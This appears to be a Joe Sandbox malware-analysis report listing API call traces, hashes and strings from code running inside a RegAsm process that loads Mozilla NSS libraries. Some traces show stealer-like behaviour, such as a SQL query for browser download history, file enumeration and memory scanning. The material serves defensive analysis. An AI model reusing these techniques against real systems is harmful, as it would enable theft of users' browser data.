                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                                    • String ID: 0$z
                                                                                    • API String ID: 310210123-2584888582
                                                                                    • Opcode ID: 62c5bfb3ce3c1f6339342200d8de82d976632163274a50ef74e37e6af8f6e15a
                                                                                    • Instruction ID: 74045c2f84009e951ddcc6ffd6cb30ab87bc731c806c9c0f1cdbaf8611a03efe
                                                                                    • Opcode Fuzzy Hash: 62c5bfb3ce3c1f6339342200d8de82d976632163274a50ef74e37e6af8f6e15a
                                                                                    • Instruction Fuzzy Hash: 774138719087469FC341DF69C480A8BBBE4BFC9354F409A2EF49987650EB30D549CF92
                                                                                    APIs
                                                                                    • TlsGetValue.KERNEL32(00000000,00000000,?,6CD7124D,00000001), ref: 6CD68D19
                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,6CD7124D,00000001), ref: 6CD68D32
                                                                                    • PL_ArenaRelease.NSS3(?,?,?,?,?,6CD7124D,00000001), ref: 6CD68D73
                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,6CD7124D,00000001), ref: 6CD68D8C
                                                                                      • Part of subcall function 6CDFDD70: TlsGetValue.KERNEL32 ref: 6CDFDD8C
                                                                                      • Part of subcall function 6CDFDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CDFDDB4
                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,6CD7124D,00000001), ref: 6CD68DBA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537699692.000000006CCD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CCD0000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2537650615.000000006CCD0000.00000002.00000001.01000000.00000007.sdmp
                                                                                     • Associated: 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp
                                                                                     • Associated: 00000001.00000002.2538473689.000000006CEAE000.00000004.00000001.01000000.00000007.sdmp
                                                                                     • Associated: 00000001.00000002.2538508502.000000006CEAF000.00000008.00000001.01000000.00000007.sdmp
                                                                                     • Associated: 00000001.00000002.2538542365.000000006CEB0000.00000004.00000001.01000000.00000007.sdmp
                                                                                     • Associated: 00000001.00000002.2538578827.000000006CEB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6ccd0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                    • String ID: KRAM$KRAM
                                                                                    • API String ID: 2419422920-169145855
                                                                                    • Opcode ID: 97f56636821e88c2f260da3b282a3c801f03281485639fa0946cf671bc458f3d
                                                                                    • Instruction ID: 13f400825c8848603f80f3a7c7a7b32a7bb6614923d512790c28f039faef255d
                                                                                    • Opcode Fuzzy Hash: 97f56636821e88c2f260da3b282a3c801f03281485639fa0946cf671bc458f3d
                                                                                    • Instruction Fuzzy Hash: 28216DB5A04601CFCB00EF7AC88466AB7F0FF56318F15896AD99887B11E735D842CFA1
                                                                                    APIs
                                                                                    • free.MOZGLUE(?,6CCB008B), ref: 6CC37B89
                                                                                    • free.MOZGLUE(?,6CCB008B), ref: 6CC37BAC
                                                                                      • Part of subcall function 6CC378C0: free.MOZGLUE(?,6CCB008B), ref: 6CC37BCF
                                                                                    • free.MOZGLUE(?,6CCB008B), ref: 6CC37BF2
                                                                                      • Part of subcall function 6CC55E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC55EDB
                                                                                      • Part of subcall function 6CC55E90: memset.VCRUNTIME140(6CC97765,000000E5,55CCCCCC), ref: 6CC55F27
                                                                                      • Part of subcall function 6CC55E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC55FB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$CriticalSection$EnterLeavememset
                                                                                    • String ID:
                                                                                    • API String ID: 3977402767-0
                                                                                    • Opcode ID: d06a90c288bb6f93bfbe0784987deff49d495643f856a02ef4b03e2eb2266cf7
                                                                                    • Instruction ID: 94fc221fc54e36b0e03f0871115498ac6b8cf9ea2f29b3b7a77180aeac3681d0
                                                                                    • Opcode Fuzzy Hash: d06a90c288bb6f93bfbe0784987deff49d495643f856a02ef4b03e2eb2266cf7
                                                                                    • Instruction Fuzzy Hash: DDC18071E01138CBEB248B28EE90B9DB772BF41318F1512E9D41EA7BC1E7319E859B51
                                                                                    APIs
                                                                                      • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                                      • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                                    Strings
                                                                                    • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CC7946B
                                                                                    • MOZ_BASE_PROFILER_LOGGING, xrefs: 6CC7947D
                                                                                    • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CC79459
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                    • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                    • API String ID: 4042361484-1628757462
                                                                                    • Opcode ID: 24a4c84fa9a339ab5e3b80b294ac612a864d47757d11aa5c1a6909d4d07a41d3
                                                                                    • Instruction ID: 63acdb4d6b6662022c5f0db05e13659c80985077e483b14b10a7b90a70b1da63
                                                                                    • Opcode Fuzzy Hash: 24a4c84fa9a339ab5e3b80b294ac612a864d47757d11aa5c1a6909d4d07a41d3
                                                                                    • Instruction Fuzzy Hash: 2B01D478A001018BD7109BEDE915A4673B5EB46328F040536E90AA7F41F731E8658D6F
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC80F6B
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC80F88
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC80FF7
                                                                                    • InitializeConditionVariable.KERNEL32(?), ref: 6CC81067
                                                                                    • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6CC810A7
                                                                                    • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6CC8114B
                                                                                      • Part of subcall function 6CC78AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6CC91563), ref: 6CC78BD5
                                                                                    • free.MOZGLUE(?), ref: 6CC81174
                                                                                    • free.MOZGLUE(?), ref: 6CC81186
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                                    • String ID:
                                                                                    • API String ID: 2803333873-0
                                                                                    • Opcode ID: f810ba0a3f8ae8bbdafab63bcb787269c7c04e690e0794fdf3ed72608c7c8fe5
                                                                                    • Instruction ID: 64f9b00a6d3357b35b803c6954f0ac9508f127866138a43e8a23e8d8222193c1
                                                                                    • Opcode Fuzzy Hash: f810ba0a3f8ae8bbdafab63bcb787269c7c04e690e0794fdf3ed72608c7c8fe5
                                                                                    • Instruction Fuzzy Hash: B361AD75A063409BDB10CF25C880B9BBBF6BFC5308F14891DE89987711EB71E949CB81
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(?,?,?,6CC41999), ref: 6CC3EA39
                                                                                    • memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6CC3EA5C
                                                                                    • memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6CC3EA76
                                                                                    • moz_xmalloc.MOZGLUE(-00000001,?,?,6CC41999), ref: 6CC3EA9D
                                                                                    • memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6CC41999), ref: 6CC3EAC2
                                                                                    • memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6CC3EADC
                                                                                    • free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6CC3EB0B
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6CC3EB27
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                    • String ID:
                                                                                    • API String ID: 706364981-0
                                                                                    • Opcode ID: 96ef0822f53e501e32504048c77324650007e9c4cdad27e8a0987a03a6821992
                                                                                    • Instruction ID: b9313526c5eeeff951eeeb50a0357a6673782edaa038a4f8b279caa98240f4cf
                                                                                    • Opcode Fuzzy Hash: 96ef0822f53e501e32504048c77324650007e9c4cdad27e8a0987a03a6821992
                                                                                    • Instruction Fuzzy Hash: 594193B1A002269FDB14CFA8DC80AAE7BA4FF45358F240628E819D7794F731DD4587D5
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(?,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B6AC
                                                                                      • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B6D1
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B6E3
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B70B
                                                                                    • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B71D
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6CC3B61E), ref: 6CC3B73F
                                                                                    • moz_xmalloc.MOZGLUE(80000023,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B760
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B79A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 1394714614-0
                                                                                    • Opcode ID: 51544dc9f21d85414a50ff5d69228bc5f52bae0b60e8556c42af2da1aae39e42
                                                                                    • Instruction ID: 297e0ebdf178e551a262bbd8912b0ef863c13781515873c65bef4c66bd142892
                                                                                    • Opcode Fuzzy Hash: 51544dc9f21d85414a50ff5d69228bc5f52bae0b60e8556c42af2da1aae39e42
                                                                                    • Instruction Fuzzy Hash: 7941E3B2D005259FCB04DF68EC945AEB7B5FB45320F250629E829E7780F731A9048BE1
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(6CCB5104), ref: 6CC3EFAC
                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CC3EFD7
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC3EFEC
                                                                                    • free.MOZGLUE(?), ref: 6CC3F00C
                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CC3F02E
                                                                                    • memcpy.VCRUNTIME140(00000000,?), ref: 6CC3F041
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC3F065
                                                                                    • moz_xmalloc.MOZGLUE ref: 6CC3F072
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                    • String ID:
                                                                                    • API String ID: 1148890222-0
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00416132
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416188
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 004161AE
                                                                                    • lstrcat.KERNEL32(?,?), ref: 004161CE
                                                                                    • lstrcat.KERNEL32(?,?), ref: 004161E2
                                                                                    • lstrcat.KERNEL32(?), ref: 004161F5
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416209
                                                                                    • lstrcat.KERNEL32(?), ref: 0041621C
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                      • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00415E66: _EH_prolog.MSVCRT ref: 00415E6B
                                                                                      • Part of subcall function 00415E66: GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 00415E83
                                                                                      • Part of subcall function 00415E66: HeapAlloc.KERNEL32(00000000,?,00000104), ref: 00415E8A
                                                                                      • Part of subcall function 00415E66: wsprintfA.USER32 ref: 00415EA2
                                                                                      • Part of subcall function 00415E66: FindFirstFileA.KERNEL32(?,?), ref: 00415EB9
                                                                                      • Part of subcall function 00415E66: StrCmpCA.SHLWAPI(?,00426894), ref: 00415ED6
                                                                                      • Part of subcall function 00415E66: StrCmpCA.SHLWAPI(?,00426898), ref: 00415EF0
                                                                                      • Part of subcall function 00415E66: wsprintfA.USER32 ref: 00415F14
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrcat$H_prolog$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
                                                                                    • String ID:
                                                                                    • API String ID: 2058169020-0
                                                                                    APIs
                                                                                    • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6CCAB5B9
                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6CCAB5C5
                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6CCAB5DA
                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6CCAB5F4
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CCAB605
                                                                                    • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6CCAB61F
                                                                                    • std::_Facet_Register.LIBCPMT ref: 6CCAB631
                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCAB655
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                                    • String ID:
                                                                                    • API String ID: 1276798925-0
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004074E7
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004077B3
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004077C7
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
                                                                                    • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                    • API String ID: 3193997572-2241552939
                                                                                    APIs
                                                                                    • free.MOZGLUE(?,?,?,6CC97ABE), ref: 6CC4985B
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6CC97ABE), ref: 6CC498A8
                                                                                    • moz_xmalloc.MOZGLUE(00000020), ref: 6CC49909
                                                                                    • memcpy.VCRUNTIME140(00000023,?,?), ref: 6CC49918
                                                                                    • free.MOZGLUE(?), ref: 6CC49975
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 1281542009-0
                                                                                    APIs
                                                                                    • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6CC8CC83,?,?,?,?,?,?,?,?,?,6CC8BCAE,?,?,6CC7DC2C), ref: 6CC4B7E6
                                                                                    • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6CC8CC83,?,?,?,?,?,?,?,?,?,6CC8BCAE,?,?,6CC7DC2C), ref: 6CC4B80C
                                                                                    • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6CC8CC83,?,?,?,?,?,?,?,?,?,6CC8BCAE), ref: 6CC4B88E
                                                                                    • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6CC8CC83,?,?,?,?,?,?,?,?,?,6CC8BCAE,?,?,6CC7DC2C), ref: 6CC4B896
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                                                                    • String ID:
                                                                                    • API String ID: 922945588-0
                                                                                    APIs
                                                                                    • strlen.MSVCRT ref: 0040F39C
                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 0040F3BD
                                                                                      • Part of subcall function 0040F1D6: strlen.MSVCRT ref: 0040F1E2
                                                                                      • Part of subcall function 0040F1D6: strlen.MSVCRT ref: 0040F1F8
                                                                                      • Part of subcall function 0040F1D6: strlen.MSVCRT ref: 0040F291
                                                                                    • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,00000000,?,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000,000000FF), ref: 0040F3EA
                                                                                    • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 0040F4B4
                                                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 0040F4C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: strlen$QueryVirtual
                                                                                    • String ID: @
                                                                                    • API String ID: 3099930812-2766056989
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004114F3
                                                                                    • strtok_s.MSVCRT ref: 0041151E
                                                                                    • StrCmpCA.SHLWAPI(00000000,00426504,00000001,?,?,?,00000000), ref: 00411561
                                                                                    • StrCmpCA.SHLWAPI(00000000,00426500,00000001,?,?,?,00000000), ref: 0041158F
                                                                                    • StrCmpCA.SHLWAPI(00000000,004264FC,00000001,?,?,?,00000000), ref: 004115B4
                                                                                    • StrCmpCA.SHLWAPI(00000000,004264F8,00000001,?,?,?,00000000), ref: 004115E5
                                                                                    • strtok_s.MSVCRT ref: 0041161B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: strtok_s$H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 1158113254-0
                                                                                    • Opcode ID: 0320dba5699f5749e52ca151f4d453234b55d3e46c78272ce7a3c657dc445f85
                                                                                    • Instruction ID: 983e4892bacab3efc4b84ef6dd796cc5fbf630586b20b5c27d1ffa4e4bf1df50
                                                                                    • Opcode Fuzzy Hash: 0320dba5699f5749e52ca151f4d453234b55d3e46c78272ce7a3c657dc445f85
                                                                                    • Instruction Fuzzy Hash: CD41AF70A00106EBDB14DF64DD81BEAB7E8BB58315F10052FE206E66A1DB3CCA858B59
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC81D0F
